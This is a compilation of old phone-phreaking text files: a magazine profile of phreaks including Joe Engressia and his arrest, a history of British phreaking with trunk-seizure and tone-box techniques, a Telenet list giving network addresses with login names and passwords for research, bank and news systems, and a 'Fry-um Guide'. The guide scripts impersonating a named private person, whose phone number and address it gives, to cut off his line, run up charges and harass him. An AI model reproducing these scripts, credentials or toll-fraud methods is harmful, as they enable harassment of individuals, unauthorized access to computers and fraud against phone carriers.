preten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doing something you're actually not, or at least it's no longe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s doing what you thought you were doing.  It's all Lewis Carro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ysical chemistry and phone-phreaking.  That's why you have these phone-phr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eudonyms like The Cheshire Cat, the Red King, and The Snark.  But the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hing about phone-phreaking that you don't find in physical chemistry."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s up at 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ever steal anyth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yes, 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you know!  You know the rush you get.  It's not just knowledge,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ysical chemistry.  It's forbidden knowledge.  You know.  You can learn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thing under the sun and be bored to death with it. But the idea that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egal.  Look: you can be small and mobile and smart and you're ripping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body large and powerful and very dangero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like Gilbertson and Alexander Graham Bell are always talking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pping off the phone company and screwing Ma Bell.  But if they were show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gle button and told that by pushing it they could turn the entire circui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T.&amp;T. into molten puddles, they probably wouldn't push i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gruntled-inventor phone phreak needs the phone system the way the lap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tholic needs the Church, the way Satan needs a God, the way The Midn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kulker needed, more than anything else, respon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r that evening Gilbertson finished telling me how delighted he was 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od of blue boxes spreading throughout the country, how delighted he wa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that "this time they're really screwed."  He suddenly shifted gea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course.  I do have this love/hate thing about Ma Bell.  In a way I alm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the phone company.  I guess I'd be very sad if they were to disinteg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ay it's just that after having been so good they turn out to have the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wrong with them.  It's those flaws that allow me to get in and mess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m, but I don't know.  There's something about it that gets to you and mak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ant to get to it, you k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sk him what happens when he runs out of interesting, forbidden thing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rn about the phone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know, maybe I'd go to work for them for a wh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security ev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do it, sure.  I just as soon play -- I'd just as soon work on ei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n figuring out how to trap phone phreaks? I said, recalling Mark Bern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 that might be interesting.  Yes, I could figure out how to outwi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phreaks.  Of course if I got too good at it, it might become bo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ain.  Then I'd have to hope the phone phreaks got much better and outsmar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for a while.  That would move the quality of the game up one level.  I m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n have to help them out, you know, 'Well, kids, I wouldn't want this to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but did you ever think of -- ?' I could keep it going at high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er levels fore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aler speaks up for the first time.  He has been staring at the so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inking patterns of light and colors on the translucent tiled wall facing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ually there are no patterns: the color and illumination of every til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rmined by a computerized random-number generator designed by Gilbert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insures that there can be no meaning to any sequence of events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se are nice games you're talking about," says the dealer to his fri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wouldn't mind seeing them screwed.  A telephone isn't private any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t say anything you really want to say on a telephone or you have to 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at paranoid bullshit.  'Is it cool to talk on the phone?' I me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n if it is cool, if you have to ask 'Is it cool,' then it isn't cool.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Is it cool,' then it isn't cool.  You know.  Like those blind ki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are going to start putting together their own private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ies if they want to really talk.  And you know what else.  You don't h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ences on the phone anymore.  They've got this time-sharing thing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distance lines where you make a pause and they snip out that piece of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use it to carry part of somebody else's conversation.  Instead of a pa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somebody's maybe breathing or sighing, you get this blank hole and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tart hearing again when someone says a word and even the beginning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is clipped off. Silences don't count -- you're paying for them, but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them away from you.  It's not cool to talk and you can't hear someone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don't talk.  What the hell good is the phone?  I wouldn't mind seeing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tally screw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ig Memphis Bu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Engressia never wanted to screw Ma Bell.  His dream had always been to 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ay I visited Joe in his small apartment on Union Avenue in Memphis, he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set about another setback in his application for a telephone jo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re stalling on it.  I got a letter today telling me they'd hav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tpone the interview I requested again.  My landlord read it for me.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ve me some runaround about wanting papers on my rehabilitation status but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 there's something else going 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 switched on the 40-watt bulb in Joe's room -- he sometimes forgets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has guests -- it looked as if there was enough telephone hardware to star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 phone company of his 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one phone on top of his desk, one phone sitting in an open dra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neath the desk top.  Next to the desk-top phone is a cigar-box-size M-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vice with big toggle switches, and next to that is some kind of switching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pling device with jacks and alligator plugs hanging loose.  Next to tha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Braille typewriter.  On the floor next to the desk, lying upside down lik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d tortoise, is the half-gutted body of an old black standard phone.  Acro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oom on a torn and dusty couch are two more phones, one of them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uch-tone model; two tape recorders; a heap of phone patches and casset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 life-size toy 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conversation is interrupted every ten minutes by phone phreaks from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the country ringing Joe on just about every piece of equipment but the to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and the Braille typewriter.  One fourteen-year-old blind kid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icut calls up and tells Joe he's got a girl friend.  He wants to talk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about girl friends. Joe says they'll talk later in the evening when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be alone on the line.  Joe draws a deep breath, whistles him off the a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n earsplitting 2600-cycle whistle. Joe is pleased to get the calls but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ed worried and preoccupied that evening, his brow constantly furrowed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dark wandering eyes.  In addition to the phone-company stall, he has j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rned that his apartment house is due to be demolished in sixty day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rban renewal.  For all its shabbiness, the Union Avenue apartment house h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en Joe's first home-of-his-own and he's worried that he may not find an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this one is demolish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hat really bothers Joe is that switchmen haven't been listening to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doing some checking on 800 numbers lately, and I've discovered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ain 800 numbers in New Hampshire couldn't be reached from Missouri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nsas.  Now it may sound like a small thing, but I don't like to see slopp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 it makes me feel bad about the lines.  So I've been calling up swit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s and reporting it, but they haven't corrected it.  I called them up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hird time today and instead of checking they just got mad.  Well,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s me mad.  I mean, I do try to help them.  There's something about them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understand -- you want to help them and they just try to say yo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rauding th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Sunday evening and Joe invites me to join him for dinner at a Holi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n.  Frequently on Sunday evening Joe takes some of his welfare money, call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b, and treats himself to a steak dinner at one of Memphis' thirteen Holi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ns.  (Memphis is the headquarters of Holiday Inn.  Holiday Inns have bee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vorite for Joe ever since he made his first solo phone trip to a B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ching office in Jacksonville, Florida, and stayed in the Holiday Inn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likes to stay at Holiday Inns, he explains, because they represent freed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im and because the rooms are arranged the same all over the country so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s that any Holiday Inn room is familiar territory to him.  Just like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steaks in the Pinnacle Restaurant of the Holiday Inn Medical Center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dison Avenue in Memphis, Joe tells me the highlights of his life as a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age seven, Joe learned his first phone trick.  A mean baby-sitter, tired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ing to little Joe play with the phone as he always did, constantly, pu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k on the phone dial.  "I got so mad.  When there's a phone sitting there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use it... so I started getting mad and banging the receiver up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n.  I noticed I banged it once and it dialed one.  Well, then I tr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nging it twice...." In a few minutes Joe learned how to dial by press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ok switch at the right time.  "I was so excited I remember going 'whoo who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at a box down on the flo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age eight Joe learned about whistling.  "I was listening to some interce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 working-number recording in L.A.- I was calling L.A. as far back a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d mainly dial non working numbers because there was no charge, and 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to these recordings all day.  Well, I was whistling 'cause listening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recordings can be boring after a while even if they are from L.A.,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a sudden, in the middle of whistling, the recording clicked off.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ddled around whistling some more, and the same thing happened.  So I cal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the switch room and said, 'I'm Joe.  I'm eight years old and I want to k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y when I whistle this tune the line clicks off.'  He tried to explain i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but it was a little too technical at the time.  I went on learning.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a thing nobody was going to stop me from doing. The phones were my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as going to pay any price to keep on learning.  I knew I could go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il.  But I had to do what I had to do to keep on lear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one is ringing when we walk back into Joe's apartment on Union Aven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Captain Crunch.  The Captain has been following me around by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ing up everywhere I go with additional bits of advice and explanation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whatever phone phreak I happen to be visiting.  This time the Cap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orts he is calling from what he describes as "my hideaway high up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erra Nevada."  He pulses out lusty salvos of M-F and tells Joe he is abou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out and get a little action tonight.  Do some phreaking of another kind,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 I mean."  Joe chuck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ptain then tells me to make sure I understand that what he told me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ing up the nation's phone lines was true, but that he and the phone phrea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new never used the technique for sabotage.  They only learned the techniq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elp the phone compan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 a lot of troubleshooting for them.  Like this New Hampshire/Missou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S-line flaw I've been screaming about.  We help them more than they k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we say good-bye to the Captain and Joe whistles him off the line, Jo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s me about a disturbing dream he had the night before: "I had been cau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y were taking me to a prison.  It was a long trip.  They were taking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 prison a long long way away.  And we stopped at a Holiday Inn and it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last night ever using the phone and I was crying and crying, and the lady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iday Inn said, 'Gosh, honey, you should never be sad at a Holiday In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uld always be happy here.  Especially since it's your last nigh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just made it worse and I was sobbing so much I couldn't stand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weeks after I left Joe Engressia's apartment, phone-company security ag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emphis police broke into it.  Armed with a warrant, which they left pin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 wall, they confiscated every piece of equipment in the room, including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y telephone.  Joe was placed under arrest and taken to the city jail where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forced to spend the night since he had no money and knew no one in Memp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not clear who told Joe what that night, but someone told him t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company had an open-and-shut case against him because of revelation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egal activity he had made to a phone-company undercover ag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morning Joe had become convinced that the reporter from Esquire, with wh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had spoken two weeks ago, was the undercover agent.  He probably had ug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ughts about someone he couldn't see gaining his confidence, listening to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 about his personal obsessions and dreams, while planning all the whil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k him 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really thought he was a reporter," Engressia told the Memphis Press-Semin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old him everything...." Feeling betrayed, Joe proceeded to conf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o the press and pol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it turns out, the phone company did use an undercover agent to trap Jo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it was not the Esquire repor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ronically, security agents were alerted and began to compile a case again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because of one of his acts of love for the system: Joe had called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l service department to report that he had located a group of defec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distance trunks, and to complain again about the New Hampshire/Missou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S problem.  Joe always liked Ma Bell's lines to be clean and responsiv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spicious switchman reported Joe to the security agents who discovered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 had never had a long-distance call charged to his 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the security agents learned that Joe was planning one of his phone tri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 local switching office.  The security people planted one of their ag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switching office.  He posed as a student switchman and followed Jo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on a tour.  He was extremely friendly and helpful to Joe, leading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the office by the arm. When the tour was over he offered Joe a ride b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is apartment house.  On the way he asked Joe -- one tech man to an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those blue boxers" he'd heard about.  Joe talked about them fre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ed about his blue box freely, and about all the other things he could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pho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xt day the phone-company security agents slapped a monitoring tape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e's line, which eventually picked up an illegal call.  Then they applie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arch warrant and broke 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court Joe pleaded not guilty to possession of a blue box and thef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A sympathetic judge reduced the charges to malicious mischief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nd him guilty on that count, sentenced him to two thirty-day sentences t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ed concurrently and then suspended the sentence on condition that Jo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mise never to play with phones again.  Joe promised, but the phone comp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used to restore his service.  For two weeks after the trial Joe could not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ched except through the pay phone at his apartment house, and the landl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eened all calls for hi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phreak Carl managed to get through to Joe after the trial, and repor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Joe sounded crushed by the whole affai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m worried about," Carl told me, "is that Joe means it this tim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mise.  That he'll never phone-phreak again.  That's what he told m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given up phone-phreaking for good.  I mean his entire life.  He says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s they're going to be watching him so closely for the rest of his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 never be able to make a move without going straight to jail.  He sou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y broken up by the whole experience of being in jail. It was awful to h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m talk that way.  I don't know.  I hope maybe he had to sound that way.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one, you k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reports that the entire phone-phreak underground is up in arms ov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company's treatment of Joe.  "All the while Joe had his hopes pinned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s application for a phone-company job, they were stringing him along get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y to bust him.  That gets me mad.  Joe spent most of his time helping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The bastards.  They think they can use him as an example.  All of sudd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re harassing us on the coast.  Agents are jumping up on our lines.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busted ------'s mute yesterday and ripped out his lines.  But no ma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Joe does, I don't think we're going to take this lying d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weeks later my phone rings and about eight phone phreaks in succession s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lo from about eight different places in the country, among them Carl, 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aptain Crunch.  A nationwide phone-phreak conference line has b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established through a switching machine in --------, with the cooperation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disgruntled switchm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have a special guest with us today," Carl tells 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xt voice I hear is Joe's.  He reports happily that he has just moved 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ce called Millington, Tennessee, fifteen miles outside of Memphis, where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s been hired as a telephone-set repairman by a small independent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Someday he hopes to be an equipment troubleshoo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he kind of job I dreamed about.  They found out about me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ity surrounding the trial.  Maybe Ma Bell did me a favor busting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have telephones in my hands all day lo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the expression, 'Don't get mad, get even'?" phone-phreak Carl ask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Well, I think they're going to be very sorry about what they did to Jo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hat they're trying to do to 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 excellent story presented here by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ken from the Official Hacker's Guide. Origin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en by myself in some book and I cannot reme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name of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Courtesy of the Jolly Roger&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HISTORY OF BRITISH PHREA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SECOND IN A SERIE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HISTORY OF.....PHI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RITTEN AND UPLOADED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LEX LUTHOR&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LEGION OF D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THE BRITISH POST OFFICE, IS THE U.S.  EQUIVALENT OF MA B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BRITAIN, PHREAKING GOES BACK TO THE EARLY FIFTIES, WHEN THE TECHNIQU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LL A DROP BACK' WAS DISCOVERED.  TOLL A WAS AN EXCHANGE NEAR ST.  PAU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ROUTED CALLS BETWEEN LONDON AND NEARBY NON-LONDON EXCHANGES.  THE TR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TO DIAL AN UNALLOCATED NUMBER, AND THEN DEPRESS THE RECEIVER-REST FOR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OND.  THIS FLASHING INITIATED THE 'CLEAR FORWARD' SIGNAL, LEAVING THE CALL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N OPEN LINE INTO THE TOLL A EXCHANGE.THE COULD THEN DIAL 018,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WARDED HIM TO THE TRUNK EXCHANGE AT THAT TIME, THE FIRST LONG DI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HANGE IN BRITAIN AND FOLLOW IT WITH THE CODE FOR THE DISTANT EXCHANG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HE WOULD BE CONNECTED AT NO EXTRA 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SIGNALS NEEDED TO CONTROL THE UK NETWORK TODAY WERE PUBLISHED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ITUTION OF POST OFFICE ENGINEERS JOURNAL" AND REPRINTED IN THE SUN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S (15 OCT.  197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SIGNALLING SYSTEM THEY USE:  SIGNALLING SYSTEM NO.  3 USES PAIR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QUENCIES SELECTED FROM 6 TONES SEPARATED BY 120HZ.  WITH THAT INF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S MADE "BLEEPERS" OR AS THEY ARE CALLED HERE IN THE U.S.  "BLUE BOX",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DO UTILIZE DIFFERENT MF TONES THEN THE U.S., THUS, YOUR U.S.  BLU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YOU SMUGGLED INTO THE UK WILL NOT WORK, UNLESS YOU CHANG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QUENC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THE EARLY SEVENTIES, A SIMPLER SYSTEM BASED ON DIFFERENT NUMBERS OF PUL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SAME FREQUENCY (2280HZ) WAS USED.  FOR MORE INFO ON THAT, TRY TO GE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D OF:  ATKINSON'S "TELEPHONY AND SYSTEMS TECHNOLOG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THE EARLY DAYS OF BRITISH PHREAKING, THE CAMBRIDGE UNIVERSITY TIT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WAS USED TO RECORD AND CIRCULATE NUMBERS FOUND BY THE EXHAUS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LING OF LOCAL NETWORKS.  THESE NUMBERS WERE USED TO CREATE A CHAIN OF LIN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LOCAL EXCHANGE TO LOCAL EXCHANGE ACROSS THE COUNTRY, BYPASSING THE TRU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RCUITS.  BECAUSE THE INTERNAL ROUTING CODES IN THE UK NETWORK ARE NO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AS THOSE DIALED BY THE CALLER, THE PHREAKS HAD TO DISCOVER THEM BY 'PRO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ISTEN' TECHNIQUES OR MORE COMMONLY KNOWN IN THE U.S.-- SCANN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DID WAS PUT IN LIKELY SIGNALS AND LISTENED TO FIND OUT IF THEY SUCCEE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SULTS OF SCANNING WERE CIRCULATED TO OTHER PHREAKS. DISCOVERING EA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TOOK TIME AT FIRST, BUT EVENTUALLY THE PHREAKS BECAME ORGANIZE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P" OF BRITAIN WAS CALLED "UNDERCURRENTS" WHICH ENABLED BRITISH PHREAK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RE THE INFO ON NEW NUMBERS, EQUIPMENT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UNDERSTAND WHAT THE BRITISH BRITISH PHREAKS DID, THINK OF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IN THREE LAYERS OF LINES:  LOCAL, TRUNK, AND INTERNATIONAL.#IN THE U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CRIBER TRUNK DIALING (STD), IS THE MECHANISM WHICH TAKES A CALL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L LINES AND (LEGITIMATELY) ELEVATES IT TO A TRUNK OR INTERNA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VEL.#THE UK PHREAKS FIGURED THAT A CALL AT TRUNK LEVEL CAN BE ROUTED THROU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NUMBER OF EXCHANGES, PROVIDED THAT THE RIGHT ROUTING CODES WERE FOUN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CORRECTLY.  THEY ALSO HAD TO DISCOVER HOW TO GET FROM LOCAL TO TRUNK LEV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THER WITHOUT BEING CHARGED (WHICH THEY DID WITH A BLEEPER BOX) OR WITH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STD).  CHAINING HAS ALREADY BEEN MENTIONED BUT IT REQUIRES LONG STR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DIGITS AND SPEECH GETS MORE AND MORE FAINT AS THE CHAIN GROWS, JUST LIK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ES WHEN YOU STACK TRUNKS BACK AND FORTH ACROSS THE U.S.#THE WAY TH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S SNAGGED THE PHREAKS WAS TO PUT A SIMPLE 'PRINTERMETER' OR AS WE CALL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PEN REGISTER ON THE SUSPECTS LINE, WHICH SHOWS EVERY DIGIT DIALED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CRIBERS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BRITISH PREFER TO GET ONTO THE TRUNKS RATHER THAN CHAINING.  ONE WAY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ISCOVER WHERE LOCAL CALLS USE THE TRUNKS BETWEEN NEIGHBORING EXCHAN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 A CALL AND STAY ON THE TRUNK INSTEAD OF RETURNING TO THE LOCAL LEVEL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CHING THE DISTANT SWITCH.  THIS AGAIN REQUIRED EXHAUSTIVE DIALING AND M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WORK FOR TITAN; IT ALSO REVEALED 'FIDDLES', WHICH WERE INSERTED BY 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ENGINE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AT FIDDLING MEANS IS THAT THE ENGINEERS REWIRED THE EXCHANGES FOR THEIR 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NEFIT.  THE EQUIPMENT IS MODIFIED TO GIVE ACCESS TO A TRUNK WITH OUT BE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GED, AN OPERATION WHICH IS PRETTY EASY IN STEP BY STEP (SX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MECHANICAL EXCHANGES, WHICH WERE INSTALLED IN BRITAIN EVEN IN THE 1970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I KNOW OF A BACK DOOR INTO THE CANADIAN SYSTEM ON A 4A CO., SO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ON SXS OR A 4A, TRY SCANNING 3 DIGIT EXCHANGES, IE:  DIAL 999,998,99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C.#AND LISTEN FOR THE BEEP-KERCHINK, IF THERE ARE NO 3 DIGIT CODES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OW DIRECT ACCESS TO A TANDEM IN YOUR LOCAL EXCHANGE AND BYPASSES THE AMA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ON'T BE BILLED, NOT HAVE TO BLAST 2600 EVERY TIME YOU WISH TO BOX A C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FAMOUS BRITISH 'FIDDLER' REVEALED IN THE EARLY 1970S WORKED BY DIALING 17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LLER THEN ADDED THE TRUNK CODE OF 1 AND THE SUBSCRIBERS LOCAL NUMBER.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IME, MOST ENGINEERING TEST SERVICES BEGAN WITH 17X, SO THE ENGINE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HIDE THEIR FIDDLES IN THE NEST OF SERVICE WIRES.  WHEN SECURITY RE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ED SEARCHING, THE FIDDLES WERE CONCEALED BY TONES SIGNALLING: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OBTAINALBE' OR 'EQUIPMENT ENGAGED' WHICH SWITCHED OFF AFTER A DELA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CESSARY RELAYS ARE SMALL AND EASILY HIDD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RE WAS ANOTHER SIDE TO PHREAKING IN THE UK IN THE SIXTIES. BEFORE STD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SPREAD, MANY 'ORDINARY' PEOPLE WERE DRIVEN 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CCASIONAL PHREAKING FROM SHEER FRUSTRATION AT THE INEFFICIENT OPER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OLLED TRUNK SYSTEM.  THIS CAME TO A HEAD DURING A STRIKE ABOUT 1961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S COULD NOT BE REACHED.  NOTHING COMPLICATED WAS NEEDED.  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S HAD BEEN IN THE HABIT OF REPEATING THE CODES AS THEY DIALLE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ESTED NUMBERS SO PEOPLE SOON LEARNT THE NUMBERS THEY CALLED FREQUEN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TRICK' WAS TO KNOW WHICH EXCHANGES COULD BE DIALLED THROUGH TO P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TRUNK NUMBER.CALLERS ALSO NEEDED A PRETTY QUIET PLACE TO DO IT, SI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ING RELATIVE TO CLICKS WAS IMPORTANT THE MOST FAMOUS TRIAL OF BRITI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KS WAS CALLED THE OLD BAILY TRIAL.#WHICH STARTED ON 3 OCT.  1973.#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PHREAKS DID WAS TO DIAL A SPARE NUMBER AT A LOCAL CALL RATE BUT INVOLV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RUNK TO ANOTHER EXCHANGE THEN THEY SEND A 'CLEAR FORWARD' TO THEIR LO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HANGE, INDICATING TO IT THAT THE CALL IS FINISHED;BUT THE DISTANT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ESN'T REALIZE BECAUSE THE CALLER'S PHONE IS STILL OFF THE HOOK.  THEY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AN OPEN LINE INTO THE DISTANT TRUNK EXCHANGE AND SENDS TO IT A 'SEIZ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  '1' WHICH PUTS HIM ONTO ITS OUTGOING LINES NOW, IF THEY KNOW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S, THE WORLD IS OPEN TO THEM.  ALL OTHER EXCHANGES TRUST HIS LOCAL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NDLE THE BILLING; THEY JUST INTERPRET THE TONES THEY HEAR.  MEAN WH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CAL EXCHANGE COLLECTS ONLY FOR A LOCAL CALL.  THE INVESTIGA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OVERED THE PHREAKS HOLDING A CONFERENCE SOMEWHERE IN ENGLAND SURROUNDED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IOUS PHONE EQUIPMENT AND BLEEPER BOXES, ALSO PRINTOUTS LISTING 'SECRET' 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CODES.  (THEY PROBABLY GOT THEM FROM TRASHING?) THE JUDGE SAID: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TO HEROIN, SOME TAKE TO TELEPHONES" FOR THEM PHONE PHREAKING WAS NO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ME BUT A HOBBY TO BE SHARED WITH PHELLOW ENTHUSIASTS AND DISCUSSED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T OFFICE OPENLY OVER DINNER AND BY MAIL.  THEIR APPROACH AND ATTITUDE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LDS LARGEST COMPUTER, THE GLOBAL TELEPHONE SYSTEM, WAS THAT OF SCIEN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UCTING EXPERIMENTS OR PROGRAMMERS AND ENGINEERS TESTING PROGRAM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THE JUDGE APPEARED TO AGREE, AND EVEN ASKED THEM FOR PHREAKING C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USE FROM HIS LOCAL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ft Untouched as I got it...-----J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Courtesy of The Jolly Roger&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d as Sh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cently, a telephone fanatic in the  northwest made an intere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overy.  He was exploring the 804 area code (Virginia) and found out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840 exchange did something str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the vast majority of cases, in fact in all of the cases except one,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get a recording as if the exchange didn't exist. However, if he dia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4-840 and four rather predictable numbers, he got a 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fter one or two rings, somebody picked up.  Being experienced at this k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ing, he could tell that the call didn't "supe", that is, no charges w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ing incurred for calling this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lls that get you to an error message, or a special operator, gener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supervise.)  A female voice, with a hint of a Southern accent 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can I help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es," he said, "What number have I reach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at number did you dial, si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 made up a number that was simil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sorry that is not the number you reached."  Cl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 was fascinated.  What in the world was this?  He knew he was going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back, but before he did, he tried some more experiments. He tried the 8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hange in several other area codes.  In some, it came up as a valid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thers, exactly the same thing happened -- the same last four digit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Southern belle.  Oddly enough, he later noticed, the areas work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med to travel in a beeline from Washington DC to Pittsburgh, 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 called back from a payphone.  "Operator, can I help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es, this is the phone company.  I'm testing this line and we don't seem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an identification on your circuit.  What office is this, ple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at number are you trying to rea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not trying to reach any number.  I'm trying to identify this circ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sorry, I can't help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am, if I don't get an ID on this line, I'll have to disconnect it.  W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w no record of it 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ld on a moment, si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fter about a minute, she came back.  "Sir, I can have someone speak to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uld you give me your number, ple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 had anticipated this and he had the payphone number ready. After he g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she said, "Mr. XXX will get right back to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anks."  He hung up the phone.  It rang.  INSTANTLY!  "Oh my God,"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ught, "They weren't asking for my number -- they were confirming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llo," he said, trying to sound authorita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Mr. XXX.  Did you just make  an inquiry to my office concerning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es.  I need an ident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at you need is advice.  Don't ever call that number again. Forget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 knew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t this point our friend got so nervous he just hung up.  He expect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r the phone ring again but it did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ver the next few days he racked his brains trying to figure out w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was.  He knew it was something big -- that was pretty certain at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nt.  It was so big that the number was programmed into every central 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country.  He knew this because if he tried to dial any other number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exchange, he'd get a local error message from his CO, as if the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n't exi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finally came to him.  He had an uncle who worked in a federal agency.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d a feeling that this was government related and if it was, his uncle c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bably find out what it was.  He asked the next day and his uncle promis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 into the mat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next time he saw his uncle, he noticed a big change in his manner.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trembling.  "Where did you get that number?!"  he shouted.  "Do you know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most got fired for asking about it?!? They kept wanting to know where I g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ur friend couldn't contain his excitement.  "What is it?" he plea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s the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HE PRESIDENT'S BOMB SHEL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 never called the number after that.  He knew that he could probably ca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te a bit of excitement by calling the number and saying something lik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ather's not good in Washington.  We're coming over for a visit."  But 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iend was smart.  he knew that there were some things that were better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said and und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fucking great story from the Official Phreaker's Gu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net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seems that not many of you know that Telenet is connected to about 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networks in the world. No, I don't mean 80 nodes, but 80 networks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usands of unprotected computers. When you call your local Telenet- gate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only call those computers which accept reverse-charging- cal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you want to call computers in foreign countries or computers in USA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not accept R-calls, you need a Telenet-ID. Did you ever notice that you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ID XXXX when being connected to Telenet? You are then asked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sword. If you have such a NUI (Network-User-ID) you can call nearly ev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st connected to any computer-network in the world. Here are some examp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6245400090184 :Is a VAX in Germany  (Username: DATEXP and leave mail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311050500061   :Is the Los Alamos Integrated computing network (On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sts connected to it is the DNA (Defense Nuclear Ag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530197000016   :Is a BBS in New Zea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4050256       :Is the S-E-Bank in Stockholm, Sweden (Login as GAM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284681140541  :CERN in Geneva in Switzerland (one of the biggest nucl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earch centers in the world) Login as GU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34212301161   :A Videotex-standard system. Type OPTEL to get in and u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999_ with the password 9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42211000001   :University of Oslo in Norway (Type  LOGIN 17,17  to pla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lti-User-Dunge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425130000215   :Something like ITT Dialcom, but this one is in Israel ! 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P  with password HELP  works fine with security level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310600584401   :Is the Washington Post News Service via Tymnet (Yes, Tymne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ed to Telenet, too !)  ID and Password is: PETER You can read the ne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next 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refixes ar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624  is Datex-P in Ger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342  is PSS in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3110  is Telenet in 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3106  is Tymnet in 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405  is Telepak in Swed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4251  is Isranet in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080  is Transpac in Fr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284  is Telepac in Switzer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24  is Eirpac in Ire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2704  is Luxpac in Luxembou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5252  is Telepac in Singap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4408  is Venus-P in Jap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o on... Some of the countries have more than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cket-switching-network (USA has 11, Canada has 3,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 That should be enough for the moment. As you see most of the password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y simple. This is because they must not have any fear of hackers. Only a f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rman hackers use these networks. Most of the computers are absolutely eas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ck !!! So, try to find out some Telenet-ID's and leave them here. If you n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numbers, leave e-m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calling from Germany via the German Datex-P network, which is simila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net. We have a lot of those NUI's for the German network, but none for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al Tymnet-outdial-computer in USA, which connects me to any ph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L8R,  Mad Ma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 Call 026245621040000 and type ID INF300 with password DATACOM to get m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s on packet-switching-networ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2: The new password for the Washington Post is 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cking with the Operator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er get an operator who gave you a hard time, and you didn't k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to do? Well if the operator hears you use a little Bell jargon, she m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e up. Here is a little diagram (excuse the artwork) of the structur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or!-- &gt; ! S.A. ! ---&gt;! BO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roup Chi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w most of the operators are not bugged, so they can curse at you, if th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ask INSTANTLY for the "S.A." or the Service Assistant. The operator doe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ort to her (95% of them are hers) but they will solve most of your probl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 MUST give you her name as she connects &amp; all of these calls are bugged.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A gives you a rough time get her BOS (Business Office Supervisor)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S/He will almost always back her girls up, but sometimes the SA will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rred and feathered. The operator reports to the Group Chief, and S/He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ve 100% of your problems, but the chances of getting S/He on the line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a lineman (the guy who works out on the poles) or an installation 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s you the works ask to speak to the Installation Foreman, that wo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nd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re is some other bell jargon, that might come in handy if you are hav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ouble with the line. Or they can be used to lie your way ou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u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 Erling is a line busy for 1 hour, used mostly in traffic studie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anent Signal is that terrible howling you get if you disconnect, but do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eryone knows what a busy signal is, but some idiots think that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ual* ringing of the phone, when it just is a tone "beeps" when the phon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nging, wouldn't bet on this though, it can (and does) get out of sy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en you get a busy signal that is 2 times as fast as the normal on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son you are trying to reach isn't really on the phone, (he might be),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ually the signal that a trunk line somewhere is busy and they haven't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reroute your call. Sometimes you will get a Recording, or if you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at all (Left High &amp; Dry in fone terms) all the recordings are be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and the system is really overused, will probably go down in a li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is happened when Kennedy was shot, the system just couldn't handl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s. By the way this is called the "reorder signal" and the trunk lin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e more thing, if an overseas call isn't completed and doesn't gene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money for AT&amp;T, is is called an "Air &amp; Water C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hrack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olume One, Issue One, Phile #4 of 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HONE PHREAK'S FRY-UM GU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PILED BY THE IRON SOLDI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HELP FROM DR. DO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IS GUIDE IS STILL BEING COMPILED, AND AS PHONE PHREAKS LEARN MOR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RT OF VENGEANCE IT WILL ALWAYS EXP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ngeance is mine", says the Phrea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1-PHONE LINE PHU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up the business office.  It should be listed at the front of the wh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s.  Say you wanted to disconnect Scott Korman's line. DIAL 800-xxx-xx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llo, this is Mr. Korman, I'm moving to California and would lik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my phone service disconnected. I'm at the airport now.  I'm calling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payphone, my number is  [414] 445 5005. You can send my final bill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where in California). Thank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2-PHONE BOO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up the business office from a pay phone.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llo, I'd like to order a Phone Book for Upper Volta (or any out-of-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 area with Direct Dialing).  This is Scott Korman, ship to 3119 N. 44th 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lwaukee, WI 53216.  Yes, I under stand it will cost $xx($25-$75!!). Tha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3-PHONE CA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up a PBX, enter the code and get an outside line.  Then dial 0+ th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ired to call.  You will hear a bonk and then an operator.  Say, "I'd lik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ge this to my home phone at 414-445-5005. Thank you."  A friend and I d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o a loser, I called him at 1:00 AM and we left the fone off the hook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  I calculated that it cost him $16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4-MISC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up the business office once again from a payfone.  Say you'd like c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warding, 3 way, etc.  Once again you are the famed loser Scot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orman.  He pays-you laugh.  You don't know how funny it was talking to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ondering what those clicks he kept hearing w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5-CHANGED &amp; UNPU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the same as in #4, but say you'd like to change and unlist your (Scot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ber.  Anyone calling him will g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W BEW BEEP.  The number you have reached, 445-5005, has been chang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non-published number.  No fur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6-FORWR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required an accomplice or two or three.  Around Christmas time, go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ys 'R' Us.  Get everyone at the customer service or manager's desk a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could you help me").  then you get on their phone and dial (usually d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 first) and the business office again. This time, say you are from Toys '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 and you'd like to add call forwarding to 445-5005.  Scott will get 100-6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s a d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 7-RUSSIAN CAL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ll a payphone at 10:00 PM.  Say to the operator that you'd like to book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to Russia.  Say you are calling from a payphone, and your number i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loser to fry (e.g. 445-5005). She will say that she'll have to call y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 in 5 hours, and you ok that. Meanwhile the loser (e.g.) Scott, will ge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at 3:00 AM from an operator saying that the call he booked to Russia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ANY QUESTIONS LEAVE E-MAIL FOR ME ON ANY BOARD I'M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ron Sold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SF-The Second Found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Country Code Listing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TED KINGDOM/IRE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RELAND.........................35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TED KINGDOM...................4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URO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ORRA..........................3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STRIA..........................4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GIUM..........................3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YPRUS..........................35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ZECHOLSLOVAKIA..................4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MARK..........................4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LAND.........................35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NCE...........................3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RMAN DEMOCRATIC REPUBLIC.......3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RMANY, FEDERAL REPUBLIC OF.....4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BRALTAR.......................35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ECE...........................3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NGARY..........................3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CELAND.........................35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ALY............................3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ECHTENSTEIN....................4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UXEMBOURG......................35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ACO...........................3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HERLANDS......................3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WAY...........................4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AND...........................4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UGAL........................35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MANIA..........................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N MARINO.......................3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IN............................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EDEN...........................4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ZERLAND......................4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KEY...........................9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TICAN CITY.....................3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UGOSLAVIA.......................3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RAL AMER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ZE..........................50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STA RICA......................50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 SALVADOR.....................50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UATEMALA.......................50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NDURAS........................50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CARAGUA.......................50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NAMA..........................50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R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GERIA.........................2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EROON........................23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GYPT............................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HIOPIA........................25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BON...........................24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ORY COAST.....................2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NYA...........................25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OTHO.........................26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BERIA.........................23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BYA...........................21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LAWI..........................26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OCCO.........................2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MIBIA.........................26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ERIA.........................2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EGAL.........................22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TH AFRICA.....................2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AZILAND.......................26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NZANIA........................2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NISIA.........................2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GANDA..........................25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AMBIA..........................2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IMBABWE........................26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CIF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ERICAN SAMOA..................68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STRAILIA.......................6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UNEI..........................67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JI............................67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NCH POLYNESIA................68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UAM............................67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NG KONG.......................85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ONESIA........................6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PAN............................8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OREA, REPUBLIC OF...............8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LAYSIA.........................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CALEDONIA...................68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ZEALAND......................6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PUA NEW GUINEA................67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ILIPPINES......................6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IPAN..........................67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GAPORE........................6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IWAN..........................88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ILAND.........................6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IAN OCE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KISTAN.........................9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RI LANKA........................9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TH AMER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ENTINA........................5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LIVIA.........................59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AZIL...........................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ILE............................5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MBIA.........................5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CUADOR.........................59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UYANA..........................59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AGUAY........................59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U.............................5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INAME........................59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RUGUAY.........................59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NEZUELA........................5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AR 